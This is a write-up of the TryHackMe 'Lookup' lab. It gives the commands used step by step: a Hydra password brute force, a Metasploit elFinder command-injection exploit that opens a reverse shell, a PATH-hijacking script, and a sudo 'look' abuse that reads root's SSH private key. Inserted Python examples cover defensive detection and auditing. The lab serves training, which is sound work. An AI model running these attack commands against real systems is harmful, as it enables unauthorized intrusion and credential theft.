Breaking the Silence: A Deep Dive into the Lookup Lab
In penetration testing, it is easy to get stuck in a routine. The Lookup lab on TryHackMe is a perfect example of why flexibility is a hacker’s greatest asset. During this engagement, I navigated several hurdles, from stubborn VPN connections to environment-specific errors in the Metasploit Framework.
Here is the technical breakdown of how I breached the machine, the exact commands utilized, and the strategic lessons learned during the process.
1. The Gateway: Establishing the Tunnel
Visibility is the prerequisite for any attack. To interact with the target, I utilized OpenVPN to bridge my local Kali machine with the TryHackMe laboratory network.
Command:
sudo openvpn your_config_file.ovpn
The Insight: Connectivity is never a given. I monitored the logs for the Initialization Sequence Completed string—the "green light" that signals the tunnel is active and the target is reachable.
2. Reconnaissance & Initial Access
The target hosted a login portal at lookup.thm. Through initial reconnaissance, I identified a potential user named jose. Rather than relying on manual guessing, I used Hydra to perform a targeted brute-force attack against the HTTP POST form.
The Attack:
hydra -l jose -P /usr/share/wordlists/rockyou.txt lookup.thm http-post-form "/login.php:user=^USER^&pass=^PASS^:F=Login failed" -t 64
Result: Successfully recovered the password: password123. This credential provided access to an authenticated dashboard featuring the elFinder file manager.
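From the defender's side, the brute force above leaves a very recognisable trace: one source address posting to /login.php many times per minute. The following detector is an added example, not code from the original write-up or from TryHackMe; it parses access-log lines in the common "combined" format (assumed) and flags any IP that crosses a failure threshold inside a sliding window. The log lines are constructed; only the hostname lookup.thm and the path /login.php come from the write-up, and the window, threshold and status-code heuristic are assumptions.

```python
"""Detect HTTP login brute-force bursts in web-server access logs.

Added example (not from the original write-up): flags source IPs that
produce many failed POST /login.php attempts inside a short window.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta
import re

# Apache/nginx "combined" log format (assumed for this example).
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)


def parse_line(line):
    """Return a dict for one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return {"ip": m.group("ip"), "ts": ts, "method": m.group("method"),
            "path": m.group("path"), "status": int(m.group("status"))}


def is_failed_login(ev):
    # The app answers a failed form login with 200 and "Login failed" in the
    # body. The access log does not show the body, so (assumption) every POST
    # to /login.php that does not redirect (3xx) is treated as a failure.
    return (ev["method"] == "POST" and ev["path"] == "/login.php"
            and not 300 <= ev["status"] < 400)


def find_bruteforce(lines, threshold=10, window=timedelta(seconds=60)):
    """Return {ip: time the threshold was first crossed} for every IP with
    at least `threshold` failed logins inside any sliding `window`.
    Lines are assumed to be in chronological order."""
    recent = defaultdict(deque)
    flagged = {}
    for line in lines:
        ev = parse_line(line)
        if ev is None or not is_failed_login(ev):
            continue
        q = recent[ev["ip"]]
        q.append(ev["ts"])
        while q and ev["ts"] - q[0] > window:   # drop events outside the window
            q.popleft()
        if len(q) >= threshold and ev["ip"] not in flagged:
            flagged[ev["ip"]] = ev["ts"]
    return flagged


def _line(ip, second, status=200, method="POST", path="/login.php"):
    # Constructed log line; timestamp, IPs and user agent are made up.
    return (f'{ip} - - [10/Jan/2024:12:00:{second:02d} +0000] '
            f'"{method} {path} HTTP/1.1" {status} 512 "-" "Mozilla/5.0"')


SAMPLE_LOG = (
    [_line("10.10.14.5", s) for s in range(0, 24, 2)]          # 12 failures in 22 s
    + [_line("192.0.2.10", 5, method="GET", path="/login.php")]  # plain page view
    + [_line("192.0.2.10", 9)]                                   # one mistyped password
    + [_line("192.0.2.10", 15, status=302)]                      # successful login
)

if __name__ == "__main__":
    for ip, when in find_bruteforce(SAMPLE_LOG).items():
        print(f"brute force suspected from {ip} (threshold crossed at {when:%H:%M:%S})")
```

A real deployment would pair this with the application's own "Login failed" counter, which sees the response body, and feed the result to rate limiting or account lockout rather than only printing it.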
3. Weaponization: The elFinder Exploit
The file manager version was vulnerable to a Command Injection flaw. I turned to the Metasploit Framework to weaponize this, specifically targeting the exiftran PHP connector.
The Metasploit Kill-Chain:
msfconsole -q
use exploit/unix/webapp/elfinder_php_connector_exiftran_cmd_injection
set RHOSTS files.lookup.thm
set VHOST files.lookup.thm
set LHOST tun0
set TARGETURI /exploit
run
The Insight: Troubleshooting the "uninitialized constant" error taught me that explicit configuration is key. Specifically, forcing LHOST to the tun0 interface ensures the reverse shell bypasses local network confusion and routes correctly through the VPN.
4. Lateral Movement: The Path Hijacking Trick
Landing as www-data provided limited access. During post-exploitation, I discovered a custom binary, /usr/sbin/pwm, which executed the id command using a relative path rather than an absolute one. This opened the door for Path Hijacking.
The Maneuver:
Stabilize the Shell:
python3 -c 'import pty; pty.spawn("/bin/bash")'
Create a Malicious "id" Script:
cd /tmp
echo -e '#!/bin/bash\necho "uid=1001(think) gid=1001(think) groups=1001(think)"' > id
chmod +x id
Manipulate the Environment:
export PATH=/tmp:$PATH
Trigger the Payload:
/usr/sbin/pwm
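The root cause here is a privileged program that calls `id` by bare name and trusts whatever PATH its caller supplies. The script below is an added example, not code from the original write-up or from the lab: it audits a PATH string for entries an unprivileged user could write to, and contrasts the lookup `pwm` effectively performs (first match along the caller's PATH) with the defensive pattern (fixed trusted directories, sanitised environment). The binary name pwm and the /tmp-first PATH come from the write-up; the trusted-directory list, the function names and the scenario built in `demo()` are assumptions.

```python
"""Audit a search PATH for hijackable entries and resolve commands safely.

Added example (not from the original write-up or the lab). Shows why a
privileged program that runs `id` by bare name is unsafe and what the
defensive lookup looks like.
"""
import os
import shutil
import stat
import subprocess
import tempfile

TRUSTED_DIRS = ("/usr/sbin", "/usr/bin", "/sbin", "/bin")   # assumed trusted set
SAFE_ENV = {"PATH": ":".join(TRUSTED_DIRS)}


def audit_path(path_value):
    """Return [(entry, reason)] for PATH entries that let a local user shadow
    a system command."""
    findings = []
    for entry in path_value.split(":"):
        if entry in ("", "."):
            findings.append((entry or "<empty>", "relative entry: the current directory is searched"))
            continue
        if not os.path.isabs(entry):
            findings.append((entry, "relative entry"))
            continue
        try:
            mode = os.stat(entry).st_mode
        except FileNotFoundError:
            findings.append((entry, "missing directory: a local user may be able to create it"))
            continue
        if mode & stat.S_IWOTH and not mode & stat.S_ISVTX:
            findings.append((entry, "world-writable without sticky bit"))
        elif mode & stat.S_IWOTH:
            # /tmp is the classic case: sticky, but anyone can add their own files.
            findings.append((entry, "world-writable (sticky): attacker-owned files can still shadow commands"))
        elif entry not in TRUSTED_DIRS and os.access(entry, os.W_OK):
            findings.append((entry, "writable by current user and outside the trusted set"))
    return findings


def resolve_unsafe(cmd, path_value):
    """What pwm effectively does: first match wins along the caller's PATH."""
    return shutil.which(cmd, path=path_value)


def resolve_trusted(cmd):
    """Defensive version: search only TRUSTED_DIRS, ignore the caller's PATH."""
    return shutil.which(cmd, path=SAFE_ENV["PATH"])


def run_trusted(cmd, *args):
    """Run a command by absolute path with a sanitised environment."""
    exe = resolve_trusted(cmd)
    if exe is None:
        raise FileNotFoundError(f"{cmd} not found in trusted directories")
    return subprocess.run([exe, *args], env=SAFE_ENV, capture_output=True,
                          text=True, check=True).stdout


def demo():
    """Constructed scenario: a user-writable directory holding a fake `id`,
    placed first in PATH, exactly as the write-up's export PATH=/tmp:$PATH."""
    with tempfile.TemporaryDirectory() as tmp:
        fake = os.path.join(tmp, "id")
        with open(fake, "w") as f:
            f.write('#!/bin/sh\necho "uid=0(fake)"\n')
        os.chmod(fake, 0o755)
        hijacked_path = f"{tmp}:{SAFE_ENV['PATH']}"
        return {
            "fake": fake,
            "unsafe": resolve_unsafe("id", hijacked_path),   # -> the fake script
            "safe": resolve_trusted("id"),                   # -> the real binary or None
            "findings": audit_path(hijacked_path),
        }


if __name__ == "__main__":
    r = demo()
    print("pwm-style lookup picks:", r["unsafe"])
    print("trusted lookup picks:  ", r["safe"])
    for entry, reason in r["findings"]:
        print(f"PATH entry {entry}: {reason}")
```

The same audit applied to the write-up's own PATH (`/tmp:...`) reports /tmp as world-writable, which is the condition that made the trick work; the fix on the program side is to call `/usr/bin/id` by absolute path (or to reset PATH before any child process), and on the host side to keep sudo and setuid programs from inheriting the invoking user's PATH at all.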
With /tmp prepended to $PATH, I tricked the system into executing my script instead of the legitimate binary, leaking the credentials for the user think.
5. Privilege Escalation: The Skeleton Key
Now operating as the user think, I audited sudo permissions and discovered I could run the look utility with root privileges. While typically used for dictionary lookups, look can be abused to read protected system files.
The Final Blow:
Read the Root SSH Private Key
sudo look "" /root/.ssh/id_rsa
I extracted the private key, saved it to my local machine, and established an SSH session as root.
The Insight: You don't always need an external exploit to gain administrative control. "Living off the Land" (LotL) by utilizing built-in binaries like look is often the most effective path to total system compromise.
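The rule that made this possible is a single sudoers line, and it is the kind of line a periodic audit should catch. The script below is an added example, not code from the original write-up or from the lab: it parses a simplified sudoers rule set and reports entries that let a non-root user run a file-reading utility as root with no argument restriction. The sudoers text is constructed; only the user name think and the binary look come from the write-up. Real sudoers syntax (aliases, Defaults options, @include) is broader than what this parser handles, so treat it as a triage helper, not a replacement for `sudo -l` or visudo.

```python
"""Flag sudo rules that let a non-root user run file-reading utilities as root.

Added example (not from the original write-up or the lab). Parses a
simplified sudoers rule set and reports rules like the `look` one abused
in the lab.
"""
import re

# Utilities that read arbitrary files when run as root. `look` is the one
# the write-up used; extend this set from your own review.
FILE_READERS = {"look"}

# user/group  host = (runas[:group]) [TAG:] command[, command...]
LINE_RE = re.compile(
    r"^(?P<who>\S+)\s+(?P<host>[^=\s]+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\))?\s*"
    r"(?P<tags>(?:\w+:\s*)*)(?P<cmds>.+)$"
)


def parse_sudoers(text):
    """Return one dict per (who, command) pair; comments and Defaults are skipped."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith(("Defaults", "@include", "#include")):
            continue
        m = LINE_RE.match(line)
        if not m:
            continue
        runas = (m.group("runas") or "root").split(":")[0].strip() or "root"
        tags = {t.strip() for t in m.group("tags").split(":") if t.strip()}
        for cmd in m.group("cmds").split(","):
            rules.append({"who": m.group("who"), "runas": runas,
                          "nopasswd": "NOPASSWD" in tags, "cmd": cmd.strip()})
    return rules


def assess(rules):
    """Return [(who, cmd, reason)] for rules that grant root-level file access."""
    findings = []
    for r in rules:
        if r["who"] == "root" or r["runas"] not in ("root", "ALL"):
            continue
        cmd = r["cmd"]
        if cmd == "ALL":
            findings.append((r["who"], cmd, "unrestricted root"))
            continue
        parts = cmd.split()
        base = parts[0].rsplit("/", 1)[-1]          # /usr/bin/look -> look
        if base in FILE_READERS and len(parts) == 1:
            # No arguments in the rule means sudo accepts ANY arguments.
            findings.append((r["who"], cmd, "file reader as root, arguments unrestricted"))
        elif "*" in cmd:
            findings.append((r["who"], cmd, "wildcard in arguments"))
    return findings


# Constructed sudoers content for this example.
SAMPLE_SUDOERS = """\
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
# the shape of the rule abused in the write-up
think   ALL=(root) NOPASSWD: /usr/bin/look
# a restricted variant: arguments are pinned, so only this exact call is allowed
backup  ALL=(root) /usr/bin/look "" /usr/share/dict/words
"""

if __name__ == "__main__":
    for who, cmd, reason in assess(parse_sudoers(SAMPLE_SUDOERS)):
        print(f"{who}: {cmd}  [{reason}]")
```

Pinning the arguments, as in the `backup` rule, is the usual remediation when the utility is genuinely needed; otherwise remove the rule, since any binary that can open a file as root is equivalent to handing over /root/.ssh/id_rsa.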
Final Lesson Learned
The Lookup lab reinforced a core tenet of cybersecurity: Persistence beats complexity. Whether it was fixing a glitched Metasploit session or manipulating a system path, the win came from understanding the underlying logic of the OS rather than just running a script.
#Cybersecurity #PenetrationTesting #TryHackMe #Linux #EthicalHacking #BugHunting
ABOUT ME:-
I am Meheraz Hosen Siam, a Cybersecurity enthusiast focused on securing the digital landscape. I specialize in Web Application Penetration Testing and Security Research, helping identify and remediate critical security flaws before they can be exploited. You can help me with your suggestions in the comment section, so post a comment and help me improve.
Thank you for reading this article